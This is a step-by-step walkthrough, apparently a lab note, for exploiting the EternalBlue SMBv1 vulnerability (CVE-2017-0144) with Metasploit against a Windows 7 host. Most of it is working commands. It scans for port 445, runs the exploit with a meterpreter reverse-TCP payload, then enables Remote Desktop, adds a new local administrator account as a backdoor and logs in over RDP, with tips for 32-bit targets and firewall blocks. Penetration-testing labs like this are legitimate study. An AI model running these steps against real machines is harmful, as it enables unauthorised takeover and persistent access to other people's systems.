CVE-2017-0144
Introduction - EternalBlue
This note uses the Metasploit exploit module for the MS17-010 vulnerability (CVE-2017-0144) to gain control of a target host. EternalBlue exploits a bug in Microsoft's SMBv1 server: the attacker scans for Windows machines that expose TCP port 445 (the SMB port, through which shared folders and shared printers on a LAN are reached) and sends crafted SMB packets to get remote code execution. Any unpatched Windows host with 445 reachable is a candidate.
- Tool: Kali Rolling x64
- Target Machine: Windows 7 Ultimate x64
Steps

```bash
nmap -p 445 10.20.20.0/28   # find hosts with SMB exposed (optional)
msfconsole
```

In msfconsole, confirm the host is vulnerable with the scanner module first, then run the exploit:

```
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.20.20.7
run                          # expect "Host is likely VULNERABLE to MS17-010!"
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 10.20.20.7
set lhost <your Kali IP>     # default payload is windows/x64/meterpreter/reverse_tcp
run                          # or: exploit
```
When the exploit succeeds you land in a meterpreter session. If it does not drop into a Windows command prompt automatically, run the following in the meterpreter shell:

```
meterpreter > shell
```

Then, in CMD, enable Remote Desktop and create a local administrator account:

```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user USERNAME PASSWORD /add
net localgroup administrators USERNAME /add
```
Back on Kali, connect over RDP with the account you just created:

```bash
rdesktop -u USERNAME -p PASSWORD 10.20.20.7:3389
# now you can control the target machine
```
Tips

The exploit module may blue-screen (BSOD) the target instead of returning a session on these OS versions:
- Windows 7 Home x86
- Windows 7 Professional x86
- Windows 7 Enterprise x86

It is likely that every 32-bit edition of Windows 7 behaves the same way, but we can attack successfully on XP SP3 (32-bit). Note that exploit/windows/smb/ms17_010_eternalblue only supports 64-bit targets; for 32-bit Windows 7 or XP the usual alternative is exploit/windows/smb/ms17_010_psexec, which needs the target to allow anonymous access to a named pipe. If the RDP connection is refused even though fDenyTSConnections is 0, the Windows firewall is probably blocking 3389; allow the "Remote Desktop" rule group from the same CMD shell before connecting.